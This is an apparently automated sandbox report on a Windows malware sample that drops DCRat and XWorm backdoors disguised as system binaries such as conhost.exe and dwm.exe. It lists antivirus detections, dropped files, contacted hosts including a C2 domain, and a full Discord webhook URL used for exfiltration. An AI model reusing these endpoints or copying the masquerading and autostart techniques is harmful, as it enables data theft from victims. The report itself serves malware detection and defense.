C:\Windows\apppatch\en-US\conhost.exe, PE32 64->74 dropped 76 C:\Windows\addins\cmd.exe, PE32 64->76 dropped 78 C:\Windows\SysWOW64\it-IT\dasHost.exe, PE32 64->78 dropped 80 6 other malicious files 64->80 dropped 124 Antivirus detection for dropped file 64->124 126 Multi AV Scanner detection for dropped file 64->126 128 Creates an undocumented autostart registry key 64->128 130 6 other signatures 64->130 72 Conhost.exe 64->72         started        signatures19 process20

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Vjy8d2EoqK.exe92%ReversingLabsWin32.Backdoor.DCRat
                        Vjy8d2EoqK.exe84%VirustotalBrowse
                        Vjy8d2EoqK.exe100%AviraVBS/Runner.VPG
                        Vjy8d2EoqK.exe100%AviraVBS/Runner.VPG
                        Vjy8d2EoqK.exe100%AviraTR/Spy.Gen
                        Vjy8d2EoqK.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%AviraHEUR/AGEN.1323984
                        C:\Brokercrt\comReviewsession.exe100%AviraHEUR/AGEN.1323984
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%AviraHEUR/AGEN.1323984
                        C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe100%AviraHEUR/AGEN.1323984
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%AviraHEUR/AGEN.1323984
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%AviraHEUR/AGEN.1323984
                        C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe100%AviraVBS/Runner.VPG
                        C:\Recovery\powershell.exe100%AviraHEUR/AGEN.1323984
                        C:\Users\user\AppData\Local\Temp\XClient.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\S l r .exe100%AviraTR/Spy.Gen
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%Joe Sandbox ML
                        C:\Brokercrt\comReviewsession.exe100%Joe Sandbox ML
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%Joe Sandbox ML
                        C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe100%Joe Sandbox ML
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%Joe Sandbox ML
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe100%Joe Sandbox ML
                        C:\Recovery\powershell.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\XClient.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\S l r .exe100%Joe Sandbox ML
                        C:\Brokercrt\comReviewsession.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Recovery\powershell.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Users\user\AppData\Local\Temp\Built.exe39%ReversingLabsWin64.Trojan.Dacic
                        C:\Users\user\AppData\Local\Temp\S l r .exe96%ReversingLabsWin32.Trojan.Dorv
                        C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe33%ReversingLabsWin32.PUA.Packunwan
                        C:\Users\user\AppData\Local\Temp\XClient.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                        C:\Users\user\AppData\Local\Temp\_MEI64962\VCRUNTIME140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\libcrypto-1_1.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\libffi-8.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exe0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\sqlite3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\svchosts.exe79%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                        C:\Users\user\AppData\Roaming\XClient.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                        C:\Windows\SysWOW64\it-IT\dasHost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Windows\addins\cmd.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        C:\Windows\apppatch\en-US\conhost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        github.com0%VirustotalBrowse
                        raw.githubusercontent.com0%VirustotalBrowse
                        ip-api.com0%VirustotalBrowse
                        discordapp.com0%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        https://www.leboncoin.fr/0%URL Reputationsafe
                        https://www.msn.com0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                        https://www.amazon.com/0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://httpbin.org/0%URL Reputationsafe
                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                        http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
                        https://MD8.mozilla.org/1/m0%URL Reputationsafe
                        https://bugzilla.mo0%URL Reputationsafe
                        http://tools.ietf.org/html/rfc6125#section-6.4.30%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%URL Reputationsafe
                        http://ocsp.sectigo.com00%URL Reputationsafe
                        https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser0%Avira URL Cloudsafe
                        https://account.bellmedia.c0%URL Reputationsafe
                        https://login.microsoftonline.com0%URL Reputationsafe
                        http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                        http://www.iana.org/time-zones/repository/tz-link.html0%URL Reputationsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
                        https://github.com/solutions/industries/financial-services0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        https://www.wykop.pl/0%URL Reputationsafe
                        https://twitter.com/0%URL Reputationsafe
                        https://www.olx.pl/0%URL Reputationsafe
                        https://github.githubassets.com/assets/github-mark-57519b92ca4e.png0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo0%Avira URL Cloudsafe
                        https://github.com/solutions/devsecops0%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        https://github.com/Blank-c/BlankOBF2%VirustotalBrowse
                        https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_0%VirustotalBrowse
                        https://github.com/features/code-review0%Avira URL Cloudsafe
                        https://github.com/solutions/industries/financial-services1%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser0%VirustotalBrowse
                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
                        https://github.com/solutions/devsecops1%VirustotalBrowse
                        https://github.com/features0%Avira URL Cloudsafe
                        https://user-images.githubusercontent.com/0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/github-mark-57519b92ca4e.png0%VirustotalBrowse
                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%Avira URL Cloudsafe
                        https://github.com/features1%VirustotalBrowse
                        https://github.com/features/code-review1%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo1%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%Avira URL Cloudsafe
                        https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt1%VirustotalBrowse
                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
                        https://github.com/solutions/industries/manufacturing0%Avira URL Cloudsafe
                        https://api.anonfiles.com/upload0%Avira URL Cloudsafe
                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_1%VirustotalBrowse
                        https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css0%Avira URL Cloudsafe
                        https://api.github.com/_private/browser/stats0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_0%Avira URL Cloudsafe
                        https://api.anonfiles.com/upload-0%Avira URL Cloudsafe
                        https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                        https://api.anonfiles.com/upload-1%VirustotalBrowse
                        https://api.anonfiles.com/upload1%VirustotalBrowse
                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
                        https://github.com/solutions/industries/manufacturing1%VirustotalBrowse
                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%Avira URL Cloudsafe
                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%VirustotalBrowse
                        https://user-images.githubusercontent.com/0%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js0%Avira URL Cloudsafe
                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css0%VirustotalBrowse
                        https://api.github.com/_private/browser/stats0%VirustotalBrowse
                        https://docs.github.com/get-started/accessibility/keyboard-shortcuts0%Avira URL Cloudsafe
                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%VirustotalBrowse
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js0%Avira URL Cloudsafe
                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js0%VirustotalBrowse
                        https://github.com/features/packages0%Avira URL Cloudsafe
                        https://docs.github.com/get-started/accessibility/keyboard-shortcuts0%VirustotalBrowse
                        https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_0%VirustotalBrowse
                        https://github.com/Pester/Pester0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js0%Avira URL Cloudsafe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                        https://discord.com/api/v9/users/0%VirustotalBrowse
                        https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js0%Avira URL Cloudsafe
                        https://github.com/Pester/Pester1%VirustotalBrowse
                        https://github.com/features/packages1%VirustotalBrowse
                        https://github.com/trending0%Avira URL Cloudsafe
                        https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js0%VirustotalBrowse
                        https://google.com/mail0%Avira URL Cloudsafe
                        https://api.github.com/_private/browser/errors0%Avira URL Cloudsafe
                        https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.0%Avira URL Cloudsafe
                        https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js0%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        cash-spoken.gl.at.ply.gg
                        147.185.221.21
                        truetrue
                          unknown
                          github.com
                          140.82.121.4
                          truefalseunknown
                          raw.githubusercontent.com
                          185.199.108.133
                          truefalseunknown
                          ip-api.com
                          208.95.112.1
                          truetrueunknown
                          discordapp.com
                          162.159.135.233
                          truetrueunknown
                          blank-curro.in
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiqtrue
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabBuilt.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/Blank-c/BlankOBFBuilt.exe, 00000003.00000003.1721899935.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722107518.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722297762.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1721185120.000001D5E552D000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722439728.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/solutions/industries/financial-servicesSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/ac/?q=Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browserSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/github-mark-57519b92ca4e.pngSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_moSolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/solutions/devsecopsSolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/features/code-reviewSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/featuresSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://user-images.githubusercontent.com/SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.leboncoin.fr/Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64Built.exe, 00000003.00000003.1711153853.000001D5E4CFD000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1711065402.000001D5E4CF5000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710267778.000001D5E4E89000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710532955.000001D5E4CBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/solutions/industries/manufacturingSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.anonfiles.com/uploadBuilt.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.cssSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.github.com/_private/browser/statsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.msn.comBuilt.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.anonfiles.com/upload-Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2033751444.00000269116F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://discord.com/api/v9/users/Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963Built.exe, 00000003.00000002.2053069084.000001D5E5520000.00000004.00001000.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXClient.exe, 00000006.00000002.2809336308.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1868518526.0000026901681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300001000.00000004.00000800.00020000.00000000.sdmp, comReviewsession.exe, 00000026.00000002.1871672428.00000000035E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyBuilt.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.jsSolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerBuilt.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.amazon.com/Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
